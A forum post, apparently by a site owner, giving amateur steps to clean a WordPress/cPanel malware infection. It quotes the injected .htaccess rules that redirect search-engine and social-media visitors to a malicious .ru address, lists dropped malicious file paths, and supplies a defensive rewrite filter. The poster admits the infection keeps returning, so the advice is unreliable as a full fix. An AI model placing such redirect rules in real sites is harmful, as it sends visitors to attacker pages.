boyxinfo

THIS METHOD HAS BEEN WORKING FOR ME FOR 3 DAYS!!! ITS FINALLY GONE!!!

TO fix website malware issues: SUGGESTION: CHANGE ALL CPANEL & FTP ACCOUNT PASSWORDS then PROCEED (not the database passwords or wordpress installions) ONLY MAIN ACCOUNT AND FTP PASSWORDS

1.Update to Latest version of WordPress on each website installations (WordPress 3.3.1)

2.Add Plugin TimThumb Vulnerability Scanner to each website -Activate Plugin, Run/Scan
If it finds updates for you, check the updates and tell it to update.

3. Now locate any files on your server that stand out like (dhauei_cache.php), (ausdhuddeee.php) – I would say that its safe to delete these files immediately!!! But continue deleting files at ur own risk. Use ur own judgement or even take a look at the coding inside. do this for each seperate website (normally these files will be found on the root of each website (ex.yourdomain.com/dhauei_cache.php) But some may be found in other folders like:

/public_html/wp-content/uploads/_cache.php
/public_html/***/wp-includes/unzip.php
/public_html/*********/wp-includes/unzip.php
/public_html/*********/wp-content/uploads/_wp_cache.php
/www/wp-content/uploads/_cache.php
/www/*********/wp-includes/unzip.php
/www/*********/wp-content/uploads/_wp_cache.php

YOU NEED TO DELETE THESE FILES NOT THE DIRECTORIES/FOLDERS!!!!

4. Now go to your cpanel, locate home/yourservername/.htaccess (u should have access to this file) select and click on change permissions (change from 444 to 644) click ok
Next click on the same file and hit EDIT

If u know what ur doing, add this code to the top of the .htaccess file

Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index_error.php [F,L]
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* – [F]

—-THEN SCROLL THRU AND REMOVE ALL OTHER CODES THAT LOOK LIKE THIS BELOW———REMEMBER DELETE THE STUFF LIKE BELOW——-

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ https://saveprefs .ru/astro/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ https://saveprefs .ru/astro/index.php [R=301,L]
</IfModule>

—–YOU MAY HAVE TO SCROLL THROUGH THE ENTIRE FILE BECAUSE SOMETIMES THE OTHER MALICIOUS CODES WILL BE AT THE BOTTOM—

ONCE YOUR DONE TAKING OUT ALL THE GARBAGE, THEN U CAN CLICK ON SAVE FILE….NOW THERE SHOULD BE A .htaccess in each seperate website you own. If you come to a .htaccess thats already (cmod 644) -CHANCES ARE ITS NOT AFFECTED SO U CAN VIEW THE FILE BY CLICKING EDIT, THEN ADDING THE LINES OF TEXT TO THE .HTACCESS OF EACH AND EVERY INDIVIDUAL WEBSITE (REMEMBERING TO CMOD 644 EACH UNLESS THEY ARE ALREADY CMODDED TO 644.

NOTE IF YOU HAVE A WORDPRESS INSTALLATION INSIDE A FOLDER (EX. yourdomain.com/wpblog/.htaccess) THEN YOU WILL NOT HAVE TO ADD THE LINE OF CODE TO THAT .HTACCESS FILE. REASON FOR THIS IS BECAUSE THE MALWARE HAS ONLY AFFECTED DIRECT ROOT FOLDERS
(ex. yourdomain1.com/.htaccess, yourdomain2.com/.htaccess, yourdomain3.com/.htaccess )

ONCE YOUR’RE DONE EDITING AND SAVING THE .HTACCESS FILES (DEPENDING ON HOW MANY SITES YOU HOST) -YOUR’RE DONE

SCAN YOUR WEBSITE WITH THE FOLLOWING FREE TOOL: https://sitecheck.sucuri.net/

YOUR SITE SHOULD COME BACK CLEAN AND FREE OF MALWARE!!!!!! Compliments of RCBUX.COM

Weird that I have hosting account with LunarPages and they called me 3 days ago asking me if I wanted them to remove the backup server files on my account. I have regular backups of my websites so I told them to delete it. Fast forward days later, I started getting the redirects on my server. Seems they were aware of this going to happen and wanted to remove any backups possible. Kinda sketchy to me plus I just renewed my hosting account with them. I think they are money hungry greedy bastards and are aware of this but havent acted upon this. I will give them a call and see whats going on because I havent been able to resolve this on my own. I correct the htaccess files then minutes later, they rewrite again.